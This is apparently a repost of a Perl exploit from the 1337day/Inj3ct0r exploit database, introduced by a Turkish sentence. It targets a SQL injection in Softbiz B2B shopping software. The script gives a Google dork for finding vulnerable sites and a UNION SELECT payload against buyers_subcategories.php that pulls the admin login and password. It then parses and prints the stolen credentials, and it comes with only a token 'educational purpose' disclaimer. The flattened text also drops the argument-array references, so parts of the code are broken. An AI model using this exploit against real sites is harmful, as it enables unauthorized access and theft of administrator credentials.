Softbiz B2B shopping Sql Injection açığı bulunmuş olup perl exploit ve açığın oluşumu şu şekilde.
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 #0 _ __ __ __ 1 #1 /' \ __ /'__`\ /\ \__ /'__`\ 0 #0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 #1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 #0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 #1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 #0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 #1 \ \____/ >> Exploit database separated by exploit 0 #0 \/___/ type (local, remote, DoS, etc.) 1 #1 1 #0 [+] Site : 1337day.com 0 #1 [+] Support e-mail : submit[at]1337day.com 1 #0 0 #1 ######################################### 1 #0 I'm Caddy-dz member from Inj3ct0r Team 1 #1 ######################################### 0 #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #### # Exploit Title: Softbiz B2B shopping sql injection Exploit (perl) # Author: Caddy-Dz # Facebook Page: .Cyber.Army # E-mail: # Category:: webapps # Google Dork: inurl:buyers_subcategories.php # Security Risk: High # Tested on: Windows Seven Edition Integral / French #### # # Greets : 1337day Team , Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3 # .. Kha&mix , King Of Pirates , xDZx-Team ... and all algerian hackers . # # this was written for educational purpose only. use it at your own risk. # author will be not responsible for any damage caused! user assumes all responsibility # intended for authorized web application pentesting only! use LWP::Simple; use LWP::UserAgent; system('cls'); system('title Softbiz B2B shopping sql injection'); system('color a'); if( < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 site.com / \n"; print "[+] Note ! : do not use (http://) and make space between host and path like the exemple"; } print "\n****************************************************\n"; print "\n* coded by Caddy-Dz *\n"; print "\n* email: islam_babia[at]hotmail.co *\n"; print "\n* Fb Page: .Cyber.Army *\n"; print "\*****************************************************\n"; ($Target, $path,$file_vuln, $sql_query,) = ; my $file_vuln = "/buyers_subcategories.php?IndustryID=-56"; my $sql_query = '+union+select+1,2,concat(0x23,LoginID,0x3a,Password,0x23)+from+admin--'; my $url = "http://" . $Target . $path . $file_vuln . $sql_query; print "\n wait!!! \n\n"; my $request = HTTP::Request->new(GET=>$url); my $useragent = LWP::UserAgent->new(); $useragent->timeout(10); my $response = $useragent->request($request); if ($response->is_success) { my $res = $response->content; if ($res =~ m/[#](.*):(.*)[#]/g) { my ($username,$password) = ($1,$2); print "[+] $username:$password \n\n"; } else { print "[-] Error, Fail to get admin login.\n\n"; } } else { print "[-] Error, ".$response->status_line."\n\n"; }